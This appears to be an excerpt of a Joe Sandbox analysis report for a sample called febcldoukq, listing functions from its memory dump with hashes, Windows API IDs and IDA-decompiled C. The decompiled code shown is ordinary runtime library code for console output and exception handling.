                                              • Instruction ID: 9ce1cddbabfd9b02ea775fab5f4b8c0d461a9840a7b302688ac9d135b805916b
                                              • Opcode Fuzzy Hash: e8091cadfab2c72a315a661d9b894d9e2c75e272234ce5991c6a0e9a18e6013e
                                              • Instruction Fuzzy Hash: 1C51E672548326AFDB298F15F441BBE77E4EF00310F1445ADE8494B190EF31AD81CB98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1B280 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ColorObjectSelect$Text
                                              • String ID:
                                              • API String ID: 2688426544-0
                                              • Opcode ID: 15204d7889b7d4ee718424de2254643bc94f90158ded52b64e65436cc75e511b
                                              • Instruction ID: 25aaa5e5efea74a3a60cb17f3e6e1f455637664ffda71bb538d2c14aedd46058
                                              • Opcode Fuzzy Hash: 15204d7889b7d4ee718424de2254643bc94f90158ded52b64e65436cc75e511b
                                              • Instruction Fuzzy Hash: F151A375A04208EFCB04DF68D198AACBBF1FF48310F5584A9E899DB351DB31EA81DB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B18D50 Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Menu$CreateLongPopupSystemWindow
                                              • String ID:
                                              • API String ID: 3388415271-0
                                              • Opcode ID: dd4f153fcba8d97aa13f27ca6027ff68e7f7533383f50e922f1d839a82773c3c
                                              • Instruction ID: d131c500353de7bca9afc58454c60c4937c3c675cf2ca2aa83950ff7bac577dc
                                              • Opcode Fuzzy Hash: dd4f153fcba8d97aa13f27ca6027ff68e7f7533383f50e922f1d839a82773c3c
                                              • Instruction Fuzzy Hash: 1A317275A04204DFCB44EF68D188B9DBBF0FB48311F5184A9E8899B351DB74AA848B42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B28F6D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B28F6D(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xb348b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00B28FE1();
					E00B28FC2();
					_t13 = WriteConsoleW( *0xb348b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                              0x00b28f8a
                                              0x00b28f8e
                                              0x00b28f9b
                                              0x00b28fa0
                                              0x00b28fbb
                                              0x00b28fbb
                                              0x00b28fc1

                                              APIs
                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000), ref: 00B28F84
                                              • GetLastError.KERNEL32(?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000,?,?,?,00B26709,?), ref: 00B28F90
                                                • Part of subcall function 00B28FE1: CloseHandle.KERNEL32(FFFFFFFE,00B28FA0,?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000,?,?), ref: 00B28FF1
                                              • ___initconout.LIBCMT ref: 00B28FA0
                                                • Part of subcall function 00B28FC2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B28F5E,00B28ABF,?,?,00B26DBE,?,?,00000000,?), ref: 00B28FD5
                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B28AD2,?,00000001,?,?,?,00B26DBE,?,?,00000000,?), ref: 00B28FB5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                              • String ID:
                                              • API String ID: 2744216297-0
                                              • Opcode ID: 7ea464c898f610f6cea3eba7610962ae69b44d063c2bfddb9fe5ee2e3eecffe0
                                              • Instruction ID: b8e1075780b23b77b7aa60cd92c95c2ca4a54f40d60bc020490d9c19986fb248
                                              • Opcode Fuzzy Hash: 7ea464c898f610f6cea3eba7610962ae69b44d063c2bfddb9fe5ee2e3eecffe0
                                              • Instruction Fuzzy Hash: 9DF0AC36501174BBCF222F96EC0499D7FAAFB097A1B254850FE1996170CF7299209B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B17930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: (
                                              • API String ID: 4218353326-3887548279
                                              • Opcode ID: 3927a2385a8048bd62ba712d800553c0edaa0be7600f269819daf2c3671dc304
                                              • Instruction ID: 5cb90c0e59b73f9d078f1396750c005649f30d81ad647bcccf0b9a5c40a4583f
                                              • Opcode Fuzzy Hash: 3927a2385a8048bd62ba712d800553c0edaa0be7600f269819daf2c3671dc304
                                              • Instruction Fuzzy Hash: 44510671918209ABDB15DF58C486BEDBBF0FF04304F4488A9E898DB350DB38EA95CB45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2771B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 47%
                                              			E00B2771B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				E00B220D7(_a12);
				_pop(_t54);
				_t37 = E00B21C6E(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00B27A82(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0xb37000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L00B2731A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}
















                                              0x00b27724
                                              0x00b27729
                                              0x00b2772a
                                              0x00b2772f
                                              0x00b27734
                                              0x00b27744
                                              0x00b2776c
                                              0x00b27797
                                              0x00b277b7
                                              0x00b277bd
                                              0x00b277f9
                                              0x00b2780d
                                              0x00000000
                                              0x00b277ca
                                              0x00b277cd
                                              0x00b277d2
                                              0x00000000
                                              0x00000000
                                              0x00b277ec
                                              0x00000000
                                              0x00b277f4
                                              0x00b277bd
                                              0x00b2779b
                                              0x00b277a2
                                              0x00b277ab
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b277a2
                                              0x00b27771
                                              0x00b27787
                                              0x00b2778c
                                              0x00000000
                                              0x00b27815
                                              0x00b27815
                                              0x00000000
                                              0x00b27817

                                              APIs
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00B27724
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ___except_validate_context_record
                                              • String ID: csm$csm
                                              • API String ID: 3493665558-3733052814
                                              • Opcode ID: c2adaeec197610a436fa59bc035834eeb2a1bd978c9ae9f666604f53e8b99f3f
                                              • Instruction ID: 6ad24ab3b8c43c404f21e6eab74184285730a1d45ed981a6359ca0c1f0ffc89b
                                              • Opcode Fuzzy Hash: c2adaeec197610a436fa59bc035834eeb2a1bd978c9ae9f666604f53e8b99f3f
                                              • Instruction Fuzzy Hash: B431F535484235DBCF268F51ED448AA7BE5FF08315B1889DAF85C49121CB32CC61DF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B14940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: EnumFamiliesFont
                                              • String ID: 1$\
                                              • API String ID: 2229041460-1239263948
                                              • Opcode ID: b32755e038ed92e11ab9c34d3e6b6886e8c67fcfa50b07af088c3c41b013d290
                                              • Instruction ID: 5267023ceb1ae169475184bdf1d58063cf8b6782eae5bebd4a1fd57680da6eb4
                                              • Opcode Fuzzy Hash: b32755e038ed92e11ab9c34d3e6b6886e8c67fcfa50b07af088c3c41b013d290
                                              • Instruction Fuzzy Hash: 5E418F74A04208DFDB14DF58C084AAABBF0FF48354F55C4AAE88D8B362D775A985CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B17480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: write failed: %lu
                                              • API String ID: 442123175-171016427
                                              • Opcode ID: d2644c2fd44a2d24c24f67d0e74d6a486134529b187b89449dc0e87a26cd39cf
                                              • Instruction ID: d1d8cf221a06f1fae83d15218047a05db28df60601f4f254094e4f8c3bfb6ad4
                                              • Opcode Fuzzy Hash: d2644c2fd44a2d24c24f67d0e74d6a486134529b187b89449dc0e87a26cd39cf
                                              • Instruction Fuzzy Hash: 4F31D4B05082459FCB00EF18C488AEA7BF6EF54355F4189A9F8898B351D774E9D4CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B175B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID: write failed: %lu
                                              • API String ID: 442123175-171016427
                                              • Opcode ID: 0c82012d2167a17ac64e85ad5364cb8017cece8db2ce26a7fe3b07f5578f58d5
                                              • Instruction ID: 986bd848135bfb21239294e3e84a5444773487822edb1ae0190d31dcec193554
                                              • Opcode Fuzzy Hash: 0c82012d2167a17ac64e85ad5364cb8017cece8db2ce26a7fe3b07f5578f58d5
                                              • Instruction Fuzzy Hash: FF1105705083049FC700EF1CD488BAA7BF5EB54355F5185B9E8898B351DB74D9D4CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%